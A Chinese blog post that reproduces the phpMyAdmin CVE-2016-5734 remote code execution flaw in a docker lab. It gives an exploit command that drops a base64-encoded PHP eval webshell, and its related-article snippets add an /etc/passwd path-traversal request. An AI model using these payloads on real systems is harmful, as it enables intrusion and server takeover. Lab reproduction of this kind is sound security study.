[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现

最新推荐文章于 2024-05-31 14:43:12 发布
最新推荐文章于 2024-05-31 14:43:12 发布
阅读量666 收藏
点赞数
分类专栏: 漏洞利用 文章标签: 漏洞利用
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/100160675
版权

触发原因:preg_replace函数引发的

触发原理:preg_replace漏洞触发有两个前提:

01:第一个参数需要e标识符,有了它可以执行第二个参数的命令

02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令

影响漏洞版本:

4.3.0-4.6.2

漏洞复现:

1、docker搭建 docker-compose up -d
2、漏洞利用代码:python phpmyadmin.py -u root --pwd="root" http://192.168.56.111:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"
3、直接连接shell文件

phpmyadmin版本查看:PHPMYADMIN目录下的README文件里面

总结:
1、pre_replace引发的漏洞在PHP版本4.3.0-5.4.6中能触发,PHP 5.4.7后就不行了
2、影响PhpMyAdmin版本为 4.3.0 - 4.6.2

漏洞分析网址:https://www.waitalone.cn/phpmyadmin-preg_replace-rce.html

小鱼儿waha
关注
专栏目录
PhpMyAdmin远程执行代码漏洞复现CVE-2016-5734
千寻的博客
03-21 1486
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 984
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
命令执行漏洞CVE-2016-5734分析
willow_liang的博客
10-17 890
命令执行漏洞 背景 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。 命令执行漏洞原理 命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 619
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
phpmyadmin CVE-2016-5734
weixin_51692662的博客
11-03 250
phpmyadmin CVE-2016-5734
vulhub-phpmyadminCVE-2016-5734
qq_26947429的博客
07-23 653
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
凝聚力安全团队
01-24 2461
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734)
jammny
11-24 1033
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734漏洞详情 在PHP5.4.7以前,preg_replace()函数的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞影响 4.0.x~4.0.10.16版本、4.4.x~4.4.15.7版本、4.6.x~4.6.3版本(PHP版本小于5.4.7) 漏洞分析 https://xz.aliyun.com/t/7836 漏洞利用
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613)复现
ximo的博客
03-22 1012
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
CVE-2016-5734 phpmyadmin远程代码执行漏洞
weixin_51387754的博客
12-06 315
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+
phpMyAdmin-4.6.6
04-06
phpMyAdmin-4.6.6-all-languages
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9646
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpMyAdmin 漏洞小集合
SoulCat
08-07 5609
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734)+4.8.1 远程文件包含漏洞CVE-2018-12613) 有情有义又是无米之炊,无情无义却是饕餮盛宴. 远程代码执行漏洞CVE-2016-5734phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修...
CVE-2016-5734 phpmyadmin 远程命令执行漏洞
qq_41567985的博客
09-27 486
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码可远程执行
CVE-2016-5734漏洞复现
qq_56426046的博客
09-11 482
在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
CVE-2016-5734 phpmyadmin 远程代码执行漏洞
最新发布
xuxuxuxxxxx的博客
05-31 366
phpMyAdmin 是一个用PHP编写的软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等等。phpMyAdmin在其查找并替换字符串功能中,将用户输入的信息拼接进 preg_replace 函数第一个参数中。在PHP5.4.7以前,preg_replace 的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734
黑白的博客
12-29 605
声明 好好学习,天天向上 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要
CVE-2016-5734远程代码执行模拟从外网进入内网
大方子
08-29 2055
【自己直接从自己的笔记中复制来的,若出现排版问题请直接查看原笔记】 文档:CVE-2016-5734远程代码执行模拟从外网?.. 链接:http://note.youdao.com/noteshare?id=fbf75e67cc1573d01982bd923ac6c179&sub=8FB1C4FA3A1A4A45BD694D18C59391B8 前言 最近学习各种漏洞,...
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值